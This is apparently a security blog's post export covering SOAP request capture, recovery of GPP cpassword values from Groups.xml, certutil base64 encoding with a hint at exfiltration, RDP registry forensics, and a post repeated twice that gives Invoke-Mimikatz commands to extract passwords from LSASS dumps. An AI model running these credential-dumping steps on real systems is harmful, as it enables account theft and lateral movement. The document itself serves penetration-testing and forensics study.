<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7nMFIwp_VPxXHP4DZh_5krF_RkLahPm3L_90eegHZYAOXvKfidmKPLyKCN8q8GGe2KBbwsFEq3Wzsu6EnG6WuYwJJiQbvSdbjKZlBj-dKDwClO23tVBrGShYg8hgbYeohS-d8a1BNJEKI/s1600/SOAP_1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7nMFIwp_VPxXHP4DZh_5krF_RkLahPm3L_90eegHZYAOXvKfidmKPLyKCN8q8GGe2KBbwsFEq3Wzsu6EnG6WuYwJJiQbvSdbjKZlBj-dKDwClO23tVBrGShYg8hgbYeohS-d8a1BNJEKI/s400/SOAP_1.PNG" width="400" /></a></div>
<br />
Below are actual SOAP request and response calls captured in Burp Suite:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQMDsw7kSBCX2bj0ZndGob2nFgfM4dzk0vPuxzECL-H1ueta0hdpEe9zAvfL_0OFOYC4ZHYHOQqOu5ec4T4PlMpU3IfqIVfPOyfxHqXwgONtXx2ZMUFzAqReleoPRB0HD2GrLK1qWYe0Ag/s1600/server+request3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQMDsw7kSBCX2bj0ZndGob2nFgfM4dzk0vPuxzECL-H1ueta0hdpEe9zAvfL_0OFOYC4ZHYHOQqOu5ec4T4PlMpU3IfqIVfPOyfxHqXwgONtXx2ZMUFzAqReleoPRB0HD2GrLK1qWYe0Ag/s400/server+request3.png" width="360" /></a></div>
<br />
<a href="https://www.youtube.com/watch?v=mKjvKPlb1rA">SOAP - Youtube Video</a></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com1tag:blogger.com,1999:blog-6767655042968972948.post-48025313649450930532016-10-21T03:19:00.003-07:002016-10-21T03:19:50.008-07:00Group Policy Misconfiguration - Encrypted password (cpassword)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
I was simulating a group policy misconfiguration issue in my Active Directory test environment and am posting it here for reference.<br />
<br />
If local admin users are pushed via GPO, domain logged-in users can just search for the "Groups.XML" file, or any ".XML" file, on their local system.<br />
<br />
This file contains an AES-encrypted password, and fortunately Microsoft has published the AES key used to encrypt this password <a href="https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx">here</a>.<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtmpe6BBAQn_0LpuIhtpX8fnZGCiU9gXzfddOe6jPQPIx0rZPvbU3rkC2USom1DEr29TnL8ZPfQXpmAb8LNMivXC8XFmCOmTEwgHJ86_F8k-I-77kUpoxsgwwL5_EqyNxmrtqsHLsl6Nnk/s1600/Pushing+Local+admin+via+gpo_5.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtmpe6BBAQn_0LpuIhtpX8fnZGCiU9gXzfddOe6jPQPIx0rZPvbU3rkC2USom1DEr29TnL8ZPfQXpmAb8LNMivXC8XFmCOmTEwgHJ86_F8k-I-77kUpoxsgwwL5_EqyNxmrtqsHLsl6Nnk/s400/Pushing+Local+admin+via+gpo_5.PNG" width="400" /></a></div>
<br />
Push the "localadmin" user via GPO - it's damn simple, you just have to add the user in Group Policy Management Editor > Computer Configuration > Preferences > Local Users and Groups<br />
<br />
Once you create the localadmin user via GPO, it shows this alert - Password is discoverable<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0VJTeOtF0hHJSWyT5kQCjX0D8XhuSIiyR7OFsJn-_D7eIt4XOu2JxVwQKiOrqwdhELULX3xIzqJ7q8axLbEjWuPweveTUVuxhKnktvH5pv7rKPL1HVDwvd3LUo3lslYhCQ-PEBziUNowE/s1600/Pushing+Local+admin+via+gpo.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0VJTeOtF0hHJSWyT5kQCjX0D8XhuSIiyR7OFsJn-_D7eIt4XOu2JxVwQKiOrqwdhELULX3xIzqJ7q8axLbEjWuPweveTUVuxhKnktvH5pv7rKPL1HVDwvd3LUo3lslYhCQ-PEBziUNowE/s400/Pushing+Local+admin+via+gpo.PNG" width="400" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0VJTeOtF0hHJSWyT5kQCjX0D8XhuSIiyR7OFsJn-_D7eIt4XOu2JxVwQKiOrqwdhELULX3xIzqJ7q8axLbEjWuPweveTUVuxhKnktvH5pv7rKPL1HVDwvd3LUo3lslYhCQ-PEBziUNowE/s1600/Pushing+Local+admin+via+gpo.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
<br />
Once the user is created, you can go to any workstation in your domain, connect to the domain controller via \\IP and search for the .XML file.<br />
<br />
We can clearly see the encrypted password in the Groups.XML file.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMCmApymXQEeKrrz_BrP1p7QGLHqDgiOpi-HnONn-xnJ9yC87MIplNQ2_4ucnDdU3eDa9sGVNLDQZeCvqZ4c_9si35Jp9ABTNAeia19v3HNZucf8yyHgnvBlGovh2m2XBzoqJ2FITIXw-0/s1600/Pushing+Local+admin+via+gpo_2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMCmApymXQEeKrrz_BrP1p7QGLHqDgiOpi-HnONn-xnJ9yC87MIplNQ2_4ucnDdU3eDa9sGVNLDQZeCvqZ4c_9si35Jp9ABTNAeia19v3HNZucf8yyHgnvBlGovh2m2XBzoqJ2FITIXw-0/s400/Pushing+Local+admin+via+gpo_2.PNG" width="400" /></a></div>
<br />
I suppose the solution for this is pretty simple: you just have to remove the user from Control Panel on the domain controller.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNT00YLfhHhTkVEEL9tbse2e9EHrNaMGNM5Up5B-WPkMh72rYHxGahhQ4sfsQtU2NxpudJxRJf-Mkli1O0mq6cZ3c6MT8qn22JNR3x-wI0cRMOvseIFn2l03Z7EKNpmU4-HcHKEF_BgWXt/s1600/Pushing+Local+admin+via+gpo_3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNT00YLfhHhTkVEEL9tbse2e9EHrNaMGNM5Up5B-WPkMh72rYHxGahhQ4sfsQtU2NxpudJxRJf-Mkli1O0mq6cZ3c6MT8qn22JNR3x-wI0cRMOvseIFn2l03Z7EKNpmU4-HcHKEF_BgWXt/s400/Pushing+Local+admin+via+gpo_3.PNG" width="400" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNT00YLfhHhTkVEEL9tbse2e9EHrNaMGNM5Up5B-WPkMh72rYHxGahhQ4sfsQtU2NxpudJxRJf-Mkli1O0mq6cZ3c6MT8qn22JNR3x-wI0cRMOvseIFn2l03Z7EKNpmU4-HcHKEF_BgWXt/s1600/Pushing+Local+admin+via+gpo_3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNT00YLfhHhTkVEEL9tbse2e9EHrNaMGNM5Up5B-WPkMh72rYHxGahhQ4sfsQtU2NxpudJxRJf-Mkli1O0mq6cZ3c6MT8qn22JNR3x-wI0cRMOvseIFn2l03Z7EKNpmU4-HcHKEF_BgWXt/s1600/Pushing+Local+admin+via+gpo_3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
<br /><br />
Extracting the password for "localadmin" using a PowerShell script<br />
<br />
You can find the script <a href="http://obscuresecurity.blogspot.in/2012/05/gpp-password-retrieval-with-powershell.html">here</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvCmFRxv7kf9n_n36Skrbbxwf87e61t7hhZUaLoyRIpD6HZJKQAEsTbc2wIFCS6Ef1L6l0TmJ8jcM8REu1U233hYjeuMmz5EHDGhsP-HR48VxqRvZxsAWpq49m1HsPlAU7N6WJ47iiJiZn/s1600/Pushing+Local+admin+via+gpo_4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvCmFRxv7kf9n_n36Skrbbxwf87e61t7hhZUaLoyRIpD6HZJKQAEsTbc2wIFCS6Ef1L6l0TmJ8jcM8REu1U233hYjeuMmz5EHDGhsP-HR48VxqRvZxsAWpq49m1HsPlAU7N6WJ47iiJiZn/s400/Pushing+Local+admin+via+gpo_4.PNG" width="400" /></a></div>
<br />
I know it's pretty simple to execute, but all I wanted to check is the actual AD configuration!<br />
<br />
Thanks.<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-63400041711145783742016-10-20T07:44:00.000-07:002016-10-20T07:44:52.478-07:00Certutil - Base64 encode/decode<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
A simple utility that comes built into Microsoft Windows: certutil.exe<br />
<br />
Link : https://technet.microsoft.com/en-us/library/cc732443(v=ws.11).aspx<br />
<br />
Very useful if you want to quickly convert a file into base64 encoding format, and probably exfiltrate later ;)<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7ghCJu97J_qclItXdZiUaDw_p4eKageYihuhvjhBs0O0XDY3IOO5D1f7dEBhXLyG4GaAwUpHPcAhhHEmaYWj-5mlgaYkDz7ChUOyg-LicF8JNiuPK4xIzMF43AZPMVFppamReQpz5XfVo/s1600/certutil_1.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="71" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7ghCJu97J_qclItXdZiUaDw_p4eKageYihuhvjhBs0O0XDY3IOO5D1f7dEBhXLyG4GaAwUpHPcAhhHEmaYWj-5mlgaYkDz7ChUOyg-LicF8JNiuPK4xIzMF43AZPMVFppamReQpz5XfVo/s400/certutil_1.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Encoding .PNG file in base64 </td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdMxgtftc_ainig7PpWtpa3lhTM2tipGV8phCfeVGAyRO9M630ePCp_qzEhQMlIrhHBNgfcSAaz3SP0ogUu9tq8VxL6vBDMP6utlQO4AU_pSEB_Qn9edBOs3fdq0Qd6YX5eLO6cd1REG-L/s1600/certutil_2.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdMxgtftc_ainig7PpWtpa3lhTM2tipGV8phCfeVGAyRO9M630ePCp_qzEhQMlIrhHBNgfcSAaz3SP0ogUu9tq8VxL6vBDMP6utlQO4AU_pSEB_Qn9edBOs3fdq0Qd6YX5eLO6cd1REG-L/s400/certutil_2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decoding base64 file</td></tr>
</tbody></table>
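<br />
certutil's encoder wraps whatever it is given in <code>-----BEGIN CERTIFICATE-----</code> / <code>-----END CERTIFICATE-----</code> lines, so an encoded PNG looks like a certificate at first glance. The added Python example below (not from the original post) decodes such blocks and reports what is really inside; it goes beyond the PNG case shown above by recognising a few other file signatures, and the sample payloads are constructed.<br />

```python
import base64
import binascii
import re

BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)

# File signatures checked at the start of the decoded payload
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "PNG image"),
    (b"MZ", "Windows executable"),
    (b"PK\x03\x04", "ZIP container"),
    (b"%PDF", "PDF document"),
]

def certutil_style_encode(data: bytes) -> str:
    """Reproduce the text layout certutil writes: header, 64-column base64, footer."""
    b64 = base64.b64encode(data).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return ("-----BEGIN CERTIFICATE-----\r\n" + "\r\n".join(lines)
            + "\r\n-----END CERTIFICATE-----\r\n")

def inspect_blocks(text: str) -> list:
    """Return one verdict per BEGIN/END CERTIFICATE block found in text."""
    verdicts = []
    for match in BLOCK.finditer(text):
        try:
            raw = base64.b64decode("".join(match.group(1).split()), validate=True)
        except binascii.Error:
            verdicts.append("not valid base64")
            continue
        label = next((name for magic, name in MAGIC if raw.startswith(magic)), None)
        if label:
            verdicts.append(label + " wrapped in certificate headers")
        elif raw[:1] == b"\x30":
            # A DER-encoded certificate begins with an ASN.1 SEQUENCE tag (0x30)
            verdicts.append("starts like DER (possible real certificate)")
        else:
            verdicts.append("unknown payload, not a certificate")
    return verdicts

def demo() -> list:
    # Constructed payloads: a PNG signature plus padding, and DER-looking bytes
    png_like = b"\x89PNG\r\n\x1a\n" + b"\x00" * 100
    der_like = bytes.fromhex("3082010a") + b"\x00" * 60
    return inspect_blocks(certutil_style_encode(png_like)
                          + certutil_style_encode(der_like))

if __name__ == "__main__":
    print(demo())
```
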
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-41476057100821292672016-08-20T06:18:00.000-07:002016-08-20T06:18:12.460-07:00RDP Access Timestamp - Registry Forensics<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
How do we know if System "A" connected to other systems using Remote Desktop in the past?<br />
<br />
We can retrieve the IP addresses with which RDP connections were established in the past, along with the last timestamp.<br />
<br />
<br />
You can find all machines to which RDP connections were made under the key below:<br />
<br />
"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"<br />
<br />
You can see all IP addresses along with the DOMAIN/USERNAME used to connect to each system via RDP<br />
<br />
If you want to retrieve the date and timestamp of the last modification of these registry keys (which in turn indicates when the RDP connection was established with the system), then:<br />
<br />
Export the registry key as a ".txt" file and you will be able to see the "Last Write Time", which is not the case if you export the key as ".reg" - that's the trick!<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVGjiNs0wt3lPAqykVc8X2Ls7DkvBjQt9rXyLfY6ev6qdtWq-qyzErRxKR1Phhyphenhyphen0Xqa_12w-8hrr2ginuhn4q1tmgdVTCz7Y-QbgL0JKvwZjNUpF7OC6rAfsK8IV4R4lxtR06hAz81fC93/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVGjiNs0wt3lPAqykVc8X2Ls7DkvBjQt9rXyLfY6ev6qdtWq-qyzErRxKR1Phhyphenhyphen0Xqa_12w-8hrr2ginuhn4q1tmgdVTCz7Y-QbgL0JKvwZjNUpF7OC6rAfsK8IV4R4lxtR06hAz81fC93/s400/1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDLJ0_m4Nnnq6rSXGio4k2fI0pS92e4-dUtNgKi9I4kEDGcSbsU7DPYfb5e50Z7ESnd53EYO5NBgzFbCOpH_SkzvRHrpqqy39o8hj3W90QWukc92F54Ar18TEQhqQ5VRaIcI5bjJsxUZY3/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDLJ0_m4Nnnq6rSXGio4k2fI0pS92e4-dUtNgKi9I4kEDGcSbsU7DPYfb5e50Z7ESnd53EYO5NBgzFbCOpH_SkzvRHrpqqy39o8hj3W90QWukc92F54Ar18TEQhqQ5VRaIcI5bjJsxUZY3/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDLJ0_m4Nnnq6rSXGio4k2fI0pS92e4-dUtNgKi9I4kEDGcSbsU7DPYfb5e50Z7ESnd53EYO5NBgzFbCOpH_SkzvRHrpqqy39o8hj3W90QWukc92F54Ar18TEQhqQ5VRaIcI5bjJsxUZY3/s400/2.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifkcUd1mNRudF4m9esreakXOOxN7FDp43TjLGKpU5yh9VMxJZj3uVeKV3u4lF0Oq8ntzoaIZc4tO22dldSPekJgld4k33IPpp214fVrexdVa36oPnZTdP908pdKJqn89zdyuVJOhEUWBzl/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifkcUd1mNRudF4m9esreakXOOxN7FDp43TjLGKpU5yh9VMxJZj3uVeKV3u4lF0Oq8ntzoaIZc4tO22dldSPekJgld4k33IPpp214fVrexdVa36oPnZTdP908pdKJqn89zdyuVJOhEUWBzl/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifkcUd1mNRudF4m9esreakXOOxN7FDp43TjLGKpU5yh9VMxJZj3uVeKV3u4lF0Oq8ntzoaIZc4tO22dldSPekJgld4k33IPpp214fVrexdVa36oPnZTdP908pdKJqn89zdyuVJOhEUWBzl/s400/4.PNG" width="400" /></a></div>
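<br />
Once the key has been exported as ".txt", the entries can be turned into a timeline. The added Python example below (not from the original post) parses such an export into one record per server with its Last Write Time and UsernameHint; the sample export, its addresses and account names are constructed, and the date format is an assumption that depends on the regional settings of the exporting machine.<br />

```python
from datetime import datetime

SERVERS_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

def decode_export(data: bytes) -> str:
    """regedit text exports are normally UTF-16 with a BOM; otherwise try UTF-8."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")

def _field(line: str) -> str:
    return line.split(":", 1)[1].strip()

def parse_rdp_export(text: str, time_format: str = "%m/%d/%Y - %I:%M %p") -> list:
    """Return one dict per server subkey, most recently written first."""
    records, current, value_name = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Key Name:"):
            key, current, value_name = _field(line), None, None
            prefix = SERVERS_KEY.upper() + "\\"
            if key.upper().startswith(prefix):       # skip the parent key itself
                current = {"server": key[len(prefix):],
                           "last_write": None, "username_hint": None}
                records.append(current)
        elif current is None:
            continue
        elif line.startswith("Last Write Time:"):
            current["last_write"] = datetime.strptime(_field(line), time_format)
        elif line.startswith("Name:"):
            value_name = _field(line)
        elif line.startswith("Data:") and value_name == "UsernameHint":
            current["username_hint"] = _field(line)
    return sorted(records, key=lambda r: r["last_write"] or datetime.min,
                  reverse=True)

# Constructed sample in the layout of a regedit ".txt" export
SAMPLE_EXPORT = r"""Key Name:          HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers
Class Name:        <NO CLASS>
Last Write Time:   8/20/2016 - 5:58 PM

Key Name:          HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\192.0.2.15
Class Name:        <NO CLASS>
Last Write Time:   8/18/2016 - 11:42 AM
Value 0
  Name:            UsernameHint
  Type:            REG_SZ
  Data:            LAB\administrator

Key Name:          HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\192.0.2.23
Class Name:        <NO CLASS>
Last Write Time:   8/20/2016 - 5:58 PM
Value 0
  Name:            UsernameHint
  Type:            REG_SZ
  Data:            LAB\svc-backup
"""

if __name__ == "__main__":
    for rec in parse_rdp_export(SAMPLE_EXPORT):
        print(rec["last_write"], rec["server"], rec["username_hint"])
```

The timestamp is the key's last modification, so each server appears once with its most recent write rather than with a full connection history.<br />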
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-46448252863976794532016-08-20T05:24:00.002-07:002017-09-11T09:02:44.156-07:00Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Came across a scenario where I was able to run PowerSploit on one of the machines (HOST) with antivirus.<br />
<br />
However, wanted to crack passwords for other systems!!!<br />
<br />
Simply get LSASS dump from other machines - Not a malicious activity!<br />
Copy all those LSASS dump files to (HOST) and, using the PowerSploit -Command argument, retrieve passwords from the LSASS dumps.<br />
<br />
Executing the PowerSploit Invoke-Mimikatz tool to retrieve passwords from an LSASS dump file.<br />
<br />
<u><br /></u>
<u>Commands Quick Reference :</u><br />
<br />
<ol style="text-align: left;">
<li>Get-ExecutionPolicy</li>
<li>Set-ExecutionPolicy Unrestricted</li>
<li>Import-Module .\powersploit.psm1</li>
<li>Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"' </li>
</ol>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgydNBveea8XIhU-RJ6BB1L1dFdhiLXFX3DCVZ3BTJfqreLtNNIxYIX0blbNxVItqcMilVwxT4h1I-b26_9aLwUJ5xERuCdNzQK2lQMy1Na4d8m9AWD7EKTZn-zoRmuK6vCWh3iaQ_hGipy/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgydNBveea8XIhU-RJ6BB1L1dFdhiLXFX3DCVZ3BTJfqreLtNNIxYIX0blbNxVItqcMilVwxT4h1I-b26_9aLwUJ5xERuCdNzQK2lQMy1Na4d8m9AWD7EKTZn-zoRmuK6vCWh3iaQ_hGipy/s400/1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1-PMMET2iBjSLuFJa3dRJUpYzt3xntFYxZF3M5ul-ed5oLexrWKWaDaU2qzxHT3crlpRx1JkQWY_hInweI_gDSm3ur0_igCJm6Q6DZG3dDI7feNWpgrWo8J4mGFmiu47x3IcPPA7mHGV0/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1-PMMET2iBjSLuFJa3dRJUpYzt3xntFYxZF3M5ul-ed5oLexrWKWaDaU2qzxHT3crlpRx1JkQWY_hInweI_gDSm3ur0_igCJm6Q6DZG3dDI7feNWpgrWo8J4mGFmiu47x3IcPPA7mHGV0/s400/2.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdkQjOvV7NAt83egHXyvdArAYh-cXZaPE5_CVK5YKre_gJG28D5fZKFem1fAs0w2JNePFLzWbILOjbZX7raPI-ek51a3a-xdkZvR4YGhQ2w4MI0dtXjXvbU5hviPCEY4dfw3g1D2BG3k3/s1600/3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdkQjOvV7NAt83egHXyvdArAYh-cXZaPE5_CVK5YKre_gJG28D5fZKFem1fAs0w2JNePFLzWbILOjbZX7raPI-ek51a3a-xdkZvR4YGhQ2w4MI0dtXjXvbU5hviPCEY4dfw3g1D2BG3k3/s400/3.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42rzA411-jmjV9ppcZlkwALyc6cORcD536MLgz6DZCpXXCokGWq6PXo0C81Sfjy7FCEs-OtOtQgCPiZ4aTezcYYAXQP_L5LMy7ye6VfWl7-D6btPzTDjwGJsOK8Lk2hIW8PFB1FOvCxI3/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42rzA411-jmjV9ppcZlkwALyc6cORcD536MLgz6DZCpXXCokGWq6PXo0C81Sfjy7FCEs-OtOtQgCPiZ4aTezcYYAXQP_L5LMy7ye6VfWl7-D6btPzTDjwGJsOK8Lk2hIW8PFB1FOvCxI3/s400/4.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgguboQEnofd8e-jGw0cvgFaoJNadMur0x71ReAaEGRmREjEo14xM8bYOkcXfAgza2sao3XXke1K3GDZ50SYN5sWdBBA9F_5Ena8RRamRUwPcCoY9q9jiANuJhLfM6x-5A3IYjODX8bT6J-/s1600/6.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgguboQEnofd8e-jGw0cvgFaoJNadMur0x71ReAaEGRmREjEo14xM8bYOkcXfAgza2sao3XXke1K3GDZ50SYN5sWdBBA9F_5Ena8RRamRUwPcCoY9q9jiANuJhLfM6x-5A3IYjODX8bT6J-/s400/6.PNG" width="400" /></a></div>
<div>
<br />
<br />
<u><b>Good references :</b></u><br />
https://github.com/PowerShellMafia/PowerSploit<br />
https://adsecurity.org/?page_id=1821<br />
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1<br />
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780<br />
<br /></div>
<div>
<br /></div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-16243226456340162702016-08-20T05:24:00.001-07:002016-08-20T05:28:27.084-07:00Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Came across a scenario where, was able to run powersploit on one of the machine (HOST) with antivirus.<br />
<br />
However, wanted to crack passwords for other systems!!!<br />
<br />
Simply get LSASS dump from other machines - Not a malicious activity!<br />
Copy all those LSASS dump files on (HOST) and using powersploit -Command argument retrieve passwords from LSASS dump.<br />
<br />
Executing powersploit - Invoke-Mimikatz tool to retrieve passwords from LSASS dump file.<br />
<br />
<u><br /></u>
<u>Commands Quick Reference :</u><br />
<br />
<ol style="text-align: left;">
<li>Get-ExecutionPolicy</li>
<li>Set-ExecutionPolicy Unrestricted</li>
<li>Import-Module.\powersploit.psm1</li>
<li>Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"' </li>
</ol>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgydNBveea8XIhU-RJ6BB1L1dFdhiLXFX3DCVZ3BTJfqreLtNNIxYIX0blbNxVItqcMilVwxT4h1I-b26_9aLwUJ5xERuCdNzQK2lQMy1Na4d8m9AWD7EKTZn-zoRmuK6vCWh3iaQ_hGipy/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgydNBveea8XIhU-RJ6BB1L1dFdhiLXFX3DCVZ3BTJfqreLtNNIxYIX0blbNxVItqcMilVwxT4h1I-b26_9aLwUJ5xERuCdNzQK2lQMy1Na4d8m9AWD7EKTZn-zoRmuK6vCWh3iaQ_hGipy/s400/1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
